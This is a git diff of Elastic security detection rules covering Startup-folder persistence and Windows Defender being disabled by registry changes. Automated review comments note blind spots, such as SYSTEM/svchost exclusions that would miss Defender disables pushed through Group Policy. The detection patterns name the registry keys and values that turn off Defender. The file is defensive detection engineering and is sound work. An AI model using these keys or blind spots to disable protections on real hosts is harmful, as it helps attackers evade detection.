False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. 
Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\",\n \"C:\\\\ProgramData\\\\*.exe\",\n \"C:\\\\Windows\\\\Temp\\\\*.exe\",\n \"C:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"C:\\\\Intel\\\\*.exe\",\n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n",
 "related_integrations": [
 {
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_108.json b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_108.json
index 2789980526d..eef855c4a20 100644
--- a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_108.json
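Review bot: The `user.domain != \"NT AUTHORITY\"` filter on the file event in `query` means a write to the all-users `C:\\ProgramData\\...\\StartUp` path by an unsigned process that is already running as SYSTEM, LocalService or NetworkService will never complete the sequence, yet neither the `note` nor the rule description mentions this scope limit, and the guide says only that the rule "looks for unsigned processes writing to the Startup folder locations". If the exclusion is deliberate (it looks like a noise reduction for system installers, though that is inferred), state it where analysts will see it, e.g. under "False positive analysis": `- File writes performed by NT AUTHORITY accounts are excluded to reduce noise from system installers; unsigned processes already running as SYSTEM are therefore out of scope for this rule and should be covered by other detections.` It is also worth confirming that Elastic Defend sets `process.code_signature.trusted` to `false` rather than omitting it for binaries that carry no signature at all, since an absent field would not satisfy `== false` and those processes would be missed by the first sequence step. The note body is unchanged by this commit apart from the `\u003e` re-encoding, so these are pre-existing gaps in the rule's documentation rather than regressions.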
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Folder Persistence via Unsigned Process", - "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. 
Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. 
Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 
!{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. 
Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\",\n \"C:\\\\ProgramData\\\\*.exe\",\n \"C:\\\\Windows\\\\Temp\\\\*.exe\",\n \"C:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"C:\\\\Intel\\\\*.exe\",\n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n", "related_integrations": [ { @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_104.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_104.json index 5a57e0cdfb2..01403fb7d07 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_104.json 
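Review bot: The investigation step `Investigate potentially compromised accounts ... login events (for example, 4624) to the target host after the registry modification` in the new note refers to a registry modification, but this rule's query matches a file write into the Startup folder, not a registry change; it should read `... to the target host after the file was written to the Startup folder.` so an analyst does not go searching for an artifact this rule never observed. Separately, the first sequence step relies on `process.code_signature.trusted == false`; if Elastic Defend omits the code_signature object for wholly unsigned binaries rather than setting trusted to false, that comparison would not match them — verify against sample events, and if so `not process.code_signature.trusted == true` is the safer form. The `\u003e` → `>` change itself is cosmetic. The rule JSON object continues outside the hunk.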
@@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_105.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_105.json index 9bd27ff1ab5..fdc8293528b 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_105.json 
@@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_106.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_106.json index 29eb21459af..104f1369f25 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_106.json 
@@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_107.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_107.json index c3100cbf645..660484c2129 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_107.json 
@@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_108.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_108.json index 44c496449b0..021fe6de889 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_108.json 
@@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_109.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_109.json new file mode 100644 index 00000000000..3974659f58a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_109.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Defender Disabled via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Disabled via Registry Modification\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for configurations that disable Windows Defender or the start of its service.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if this operation was approved and performed according to the organization's change management policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Re-enable Windows Defender and restore the service configurations to automatic start.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (\n (\n registry.path: (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\"\n ) and\n registry.data.strings: (\"1\", \"0x00000001\")\n ) or\n (\n registry.path: (\n \"HKLM\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\"\n ) and\n registry.data.strings in (\"3\", \"4\", \"0x00000003\", \"0x00000004\")\n )\n ) and\n\n not\n (\n process.executable : (\n \"?:\\\\WINDOWS\\\\system32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\Security Agent\\\\NTRmv.exe\"\n ) and user.id : \"S-1-5-18\"\n )\n", + "references": [ + "https://thedfirreport.com/2020/12/13/defender-control/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2ffa1f1e-b6db-47fa-994b-1512743847eb_109", + "type": "security-rule" +} \ No newline at end of file 
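Review bot: The exclusion `not (process.executable : (services.exe, svchost.exe, NTRmv.exe) and user.id : "S-1-5-18")` in the query silences every SYSTEM-context write made by svchost.exe, and `HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware` is precisely where a Group Policy-delivered setting lands — so a Defender disable pushed through a domain GPO (a common ransomware precursor) is presumably applied by the policy client inside svchost.exe and will never fire this rule, and the same carve-out hides a malicious service DLL hosted in svchost. The investigation guide should state that limitation so analysts do not treat silence as coverage, e.g. under False positive analysis: `- This rule intentionally ignores SYSTEM-context writes from services.exe and svchost.exe; a Defender policy applied via Group Policy flows through those processes and will not alert here, so correlate with Group Policy modification events.` It is also worth a hedged line in the note that recent Windows 10/11 builds with Tamper Protection enabled ignore `DisableAntiSpyware`, so a hit on that key may be a failed attempt rather than a disabled engine — still worth alerting, but the response step "Re-enable Windows Defender" currently assumes it is off. Minor style point: the two registry branches use `registry.data.strings :` (wildcard match) and `registry.data.strings in` (exact match) for equivalent checks; pick one form for consistency.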
diff --git a/packages/security_detection_engine/kibana/security_rule/301571f3-b316-4969-8dd0-7917410030d3_1.json b/packages/security_detection_engine/kibana/security_rule/301571f3-b316-4969-8dd0-7917410030d3_1.json
index 63f0afbf6d4..218a2f29aa3 100644
--- a/packages/security_detection_engine/kibana/security_rule/301571f3-b316-4969-8dd0-7917410030d3_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/301571f3-b316-4969-8dd0-7917410030d3_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_103.json b/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_103.json
index 76dbea350e7..fa54f506818 100644
--- a/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_103.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_104.json b/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_104.json
index a4ef8f5387e..675343eab96 100644
--- a/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_104.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_1.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_1.json
index 3e3f27a2f57..63db55d48cb 100644
--- a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_1.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_2.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_2.json
index d2c2648923d..09dc51389e7 100644
--- a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_2.json
